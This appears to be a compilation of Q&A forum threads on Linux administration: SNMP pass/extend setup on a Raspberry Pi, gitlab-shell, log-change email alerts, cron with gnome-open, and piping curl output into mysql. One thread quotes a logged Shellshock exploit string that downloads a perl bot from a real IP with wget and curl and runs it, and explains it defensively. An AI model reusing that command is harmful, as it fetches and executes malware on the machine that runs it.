SNMP pass command returning OID error but apparently running on server

I'm just taking my first steps with SNMP: I'm trying to add the output of a simple check script to SNMP, but I'm running into some issues.
I want a temperature check script on a Raspberry Pi 4 to be returned via SNMP to a remote poller, but following most of the guides online has led me nowhere, since I'm stuck with this error every time:
No Such Instance currently exists at this OID
I'm trying to use the pass directive, but I've had no luck getting any result.
This is what I currently have declared in snmpd.conf:
pass 1.3.6.1.2.1.25.1.8 /bin/bash /script/check_temp.sh
This is the output when I run the script by hand:
/script/check_temp.sh
.1.3.6.1.2.1.25.1.8
integer
589
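The script just prints the OID, the type and the value on separate lines, as the pass protocol expects for a GET; a minimal sketch of that kind of script (the sysfs path and the scaling to tenths of a degree here are only an example, not necessarily what check_temp.sh really does) would be:
#!/bin/bash
# print OID, SNMP type and value, one per line, as "pass" expects for a GET
echo ".1.3.6.1.2.1.25.1.8"
echo "integer"
# thermal_zone0 reports millidegrees Celsius; /100 gives tenths of a degree (e.g. 589 = 58.9 C)
echo $(( $(cat /sys/class/thermal/thermal_zone0/temp) / 100 ))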
This is the command output from the poller:
snmpget -c test -v 2c 1.2.3.4 .1.3.6.1.2.1.25.1.8
HOST-RESOURCES-MIB::hrSystem.8 = No Such Instance currently exists at this OID
But if I run snmpd in the foreground I don't actually see any error; instead it looks like the script is executed:
sudo snmpd -f -Le -Ducd-snmp/pass -Drun
registered debug token ucd-snmp/pass, 1
registered debug token run, 1
NET-SNMP version 5.7.3
ucd-snmp/pass: pass-running: /bin/bash /usr/script/check_temperature/check_temp.sh -g .1.3.6.1.2.1.25.1.8
run:exec: running '/bin/bash /usr/script/check_temperature/check_temp.sh -g .1.3.6.1.2.1.25.1.8'
run:exec: got 120000 bytes
run:exec: child 7480 finished. result=768
What am I doing wrong? None of the guides I checked mentioned creating MIBs or any steps beyond what I'm already doing, but I'm still not getting the result I expect.
Thanks in advance for any hint or suggestion that puts me on the right track.

I hope this helps anybody trying to configure SNMP checks for their Raspberry Pi, or any other typical Linux device, since most of the guides I checked assume you already know some SNMP concepts, which you may well not have mastered yet when you're just starting out.
Most of the guides tell you to use either extend or pass as follows:
view all included .1.3.6.1.4.1
pass .1.3.6.1.4.1.9999.1 /bin/bash /path/to/command
extend checkcommand /bin/bash /path/to/command
With that configuration I ran into the issues from my original question; I was only able to get things working when I used the following lines instead, pointing the extend directive at an empty OID branch and giving the "all" view access to the .1.3.6.1.4.1 branch:
view all included .1.3.6.1.4.1
extend .1.3.6.1.4.1.9999.1 checkcommand /bin/bash /path/to/command
This way I actually get a reply from snmpwalk, and from the snmpwalk output on OID .1.3.6.1.4.1.9999.1 you can see the exact OID snmpd builds for the script's output, which is the one you then query from the poller, for example:
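(Assuming the community string, address and .1.3.6.1.4.1.9999.1 branch used above; the exact sub-OIDs are built by snmpd, so copy them from your own walk rather than from here.)
# walk the registered branch from the poller; snmpd lists the OIDs it built
# for the extend entry together with the script output
snmpwalk -v 2c -c test 1.2.3.4 .1.3.6.1.4.1.9999.1
# then query the specific output OID the walk revealed, e.g.:
snmpget -v 2c -c test 1.2.3.4 <OID-shown-by-the-walk>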
I know this is probably basic, but all the tutorials and guides I read at first seemed to take one or more of these steps for granted, so I hope this can be of help to other SNMP beginners.

Related

How to use gitlab-shell?

I can't seem to find any information or examples about how to use gitlab-shell. My initial approach was simply to attempt an SSH session from my development box to the server. I received an error response like the one from this post:
jacob@mypc: ssh git@git.example.com
PTY allocation request failed on channel 0
Welcome to GitLab, jacob!
Connection to git.example.com closed.
The error was alleviated by adding the -T parameter like this user does:
jacob@mypc: ssh -T git@git.example.com
Welcome to GitLab, jacob!
However, as would be expected with the -T parameter, I am not presented with a shell. At this point I'm not sure what to do. How is gitlab-shell supposed to be used?
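For what it's worth, gitlab-shell is not meant to give you an interactive shell at all; it sits behind the git user's SSH login and only dispatches git operations. So the usual way it gets exercised is just ordinary git commands over SSH (the group/project path below is a made-up example):
# clone a project through gitlab-shell: it authorizes your key and hands the
# connection over to git; no interactive shell is ever opened
git clone git@git.example.com:mygroup/myproject.git
# subsequent fetches and pushes go through the same path
git push origin master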

linux script to send me an email every time a log file changes

I am looking for a simple way to constantly monitor a log file and send me an email notification every time this log file changes (new lines have been added to it).
The system runs on a Raspberry Pi 2 (Raspbian / Debian Stretch) and the log records the activity of a GPIO Python script running as a daemon.
I need something very simple and lightweight; I don't even care about having the text of the new log entry, because I already know what it says: it is always the same 24 lines of text appended at the end.
Also, the log.txt file gets recreated every day at midnight, so that might represent another issue.
I already have a working Python script that sends me a simple email via Gmail (I called it sendmail.py).
What I tried so far was creating and running the following bash script:
monitorlog.sh
#!/bin/bash
tail -F log.txt | python ./sendmail.py
The problem is that it just sends an email every time I execute it, but when the log actually changes, it just quits.
I am really new to linux so apologies if I missed something.
Cheers
You asked for simple:
#!/bin/bash
# Poll the line count every few seconds and send a mail whenever it changes.
cur_line_count="$(wc -l < myfile.txt)"
while true
do
    new_line_count="$(wc -l < myfile.txt)"
    if [ "$cur_line_count" != "$new_line_count" ]
    then
        python ./sendmail.py
    fi
    cur_line_count="$new_line_count"
    sleep 5
done
I've done this a bunch of different ways. If you run a cron job every minute that counts the number of lines (wc -l), compares that to a stored count (e.g. in /tmp/myfilecounter), and sends an email when the numbers differ, you get the same effect without keeping a script running; a sketch of that variant follows below.
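A minimal sketch of that cron approach, assuming the log lives at /home/pi/log.txt and the mail script at /home/pi/sendmail.py (both paths are placeholders for your own):
#!/bin/bash
# run from cron, e.g.:  * * * * * /home/pi/checklog.sh
logfile=/home/pi/log.txt
countfile=/tmp/myfilecounter
# current number of lines (falls back to 0 if the file is missing)
new=$(wc -l < "$logfile" 2>/dev/null || echo 0)
# previously stored count (0 on the first run)
old=$(cat "$countfile" 2>/dev/null || echo 0)
if [ "$new" != "$old" ]; then
    python /home/pi/sendmail.py
fi
echo "$new" > "$countfile"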
If you have inotify, there are more direct ways to get "woken up" when the file changes, e.g. https://serverfault.com/a/780522/97447 or https://serverfault.com/search?q=inotifywait.
If you don't mind adding a package to the system, incron is a very convenient way to run a script whenever a file or directory is modified, and it looks like it's supported on raspbian (internally it uses inotify). https://www.linux.com/learn/how-use-incron-monitor-important-files-and-folders. Looks like it's as simple as:
sudo apt-get install incron
sudo vi /etc/incron.allow # Add your userid to this file (or just rm /etc/incron.allow to let everyone use incron)
incrontab -e # Add the following line to the incron table
/path/to/log.txt IN_MODIFY python /path/to/sendmail.py
And you'd be done!

Getting very strange user agent in logs

My logs show a very strange user agent, which is shown below:
() { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx"
Can anyone tell me what it is trying to do? I think it is a hacking attempt, and I'd like to know how I can restrict access to block it.
That does indeed look like an attempt to exploit the Shellshock bash bug. https://security.stackexchange.com/questions/68122/what-is-a-specific-example-of-how-the-shellshock-bash-bug-could-be-exploited
The sender of that request is trying to get your machine to download a perl script called efixx from http://151.236.44.210/ and then execute it. That perl script is the "LinuxNet perlbot".
You should check to make sure you don't have a file called "efixx" on your computer, and if you do, make sure it isn't running. Also make sure you are running the latest version of bash and you should be OK.
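If you want to check the bash side quickly, the widely circulated self-test for the original Shellshock issue (CVE-2014-6271) looks like this; a patched bash prints only "test", a vulnerable one also prints "vulnerable":
# harmless self-test: export a function definition and see whether bash
# also executes the command smuggled in after it when importing the variable
env x='() { :;}; echo vulnerable' bash -c 'echo test'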

Can Cron Jobs Use Gnome-Open?

I am running Ubuntu 11.10 (Unity interface) and I created a Bash script that uses 'gnome-open' to open a series of web pages I use every morning. When I manually execute the script in the Terminal, the bash script works just fine. Here's a sample of the script (it's all the same so I've shortened it):
#!/bin/bash
gnome-open 'https://docs.google.com';
gnome-open 'https://mail.google.com';
Since it seemed to be working well, I added a job to my crontab (mine, not root's) to execute every weekday at a specific time.
Here's the crontab entry:
30 10 * * 1,2,3,4,5 ~/bin/webcheck.sh
The problem is this error gets returned for every single 'gnome-open' command in the bash script:
GConf-WARNING **: Client failed to connect to the D-BUS daemon:
Unable to autolaunch a dbus-daemon without a $DISPLAY for X11
GConf Error: No D-BUS daemon running
Error: no display specified
I did some searching to try and figure this out. The first thing I tried was relaunching the daemon using SIGHUP:
killall -s SIGHUP gconfd-2
That didn't work so I tried launching the dbus-daemon using this code from the manpage for dbus-launch:
## test for an existing bus daemon, just to be safe
if test -z "$DBUS_SESSION_BUS_ADDRESS" ; then
    ## if not found, launch a new one
    eval `dbus-launch --sh-syntax --exit-with-session`
    echo "D-Bus per-session daemon address is: $DBUS_SESSION_BUS_ADDRESS"
fi
But that didn't do anything.
I tried adding simply 'dbus-launch' at the top of my bash script and that didn't work either.
I also tried editing the crontab to include the path to Bash, because I saw that suggestion on another thread but that didn't work.
Any ideas on how I can get this up and running?
Here is how the problem was solved. It turns out the issue was primarily that the script, when run from cron, had no access to an X session (or at least that's how I understood it), so the fix was to edit my crontab like so:
30 10 * * 1,2,3,4,5 export DISPLAY=:0 && ~/bin/webcheck.sh
The "export DISPLAY=:0" statement told cron which display to use. I found the answer on this archived Ubuntu forum after searching for "no display specified" or something like that:
http://ubuntuforums.org/archive/index.php/t-105250.html
So now, whenever I'm logged in, exactly at 10:30 my system will automatically launch a series of webpages that I need to look at every day. Saves me having to go through the arduous process of typing in my three-letter alias every time :)
Glad you asked!
It depends on when it is run.
If the Gnome GDM Greeter is live, you can use the DBUS session from the logon dialog, if you will. You can, e.g., use this to send notifications to the logon screen, if no-one is logged in:
function do_notification
{
    # run notify-send in every active gnome-session, as that session's user
    for pid in $(pgrep gnome-session); do
        unset COOKIE
        # borrow the D-Bus address from the session's environment
        COOKIE="$(grep -z DBUS_SESSION_BUS_ADDRESS /proc/$pid/environ | cut -d= -f2-)"
        GNUSER="$(ps --no-heading -o uname $pid)"
        echo "Notifying user $GNUSER (gnome-session $pid) with '$@'"
        sudo -u "$GNUSER" DBUS_SESSION_BUS_ADDRESS="$COOKIE" /usr/bin/notify-send -c "From CRON:" "$@"
    done
    unset COOKIE
}
As you can see the above code simply runs the same command (notify-send) on all available gnome-sessions, when called like:
do_notification "I wanted to let you guys know"
You can probably pick this apart and put it to use for your own purposes.

Pass result of Curl request to mysql command line

So this is a bit of an odd request, but I'm hoping someone on here knows some command line fu. Might have to post to Server Fault too, we'll see.
I'm trying to figure out how I can pass the results of a curl request to the mysql command line application. So basically something kind of like this:
mysql --user=root --password=my_pass < (curl http://localhost:3000/application.sql)
where that URL returns basically a text response with sql statements.
Some context:
An application I am developing supports multiple installations, as part of the installation process for a new instance we spin up a copy of our "data" database for the new instance.
I'm trying to automate the deployment process as much as possible, so I built a small "dashboard" app in Rails that can generate the sql statements, config files, etc. for each instance, and also helps us see stats about the instances and other fun stuff. Now I'm writing Capistrano tasks to actually do a deployment based on the ID of the installation, which I pass in as a variable.
The initial deployment setup includes creating the application's database, which this sql request will do. I could in theory pull the file with a wget request, execute it and delete it, but I thought it would be cleaner to just have the remote server curl it and execute it in one step.
So any ideas?
I'm fairly certain the syntax you have originally won't work, as the '<' expects a file. Instead you want to pipe the output of curl, which by default prints to STDOUT, into mysql.
I believe the following will work for you.
curl http://localhost:3000/application.sql | mysql --user=root --password=my_pass
In Bash, you can do process substitution:
mysql ... < <(curl ...)
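Spelled out with the options from the question (the -s just keeps curl's progress meter out of the SQL stream; both flags shown are standard curl/mysql options):
mysql --user=root --password=my_pass < <(curl -s http://localhost:3000/application.sql)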
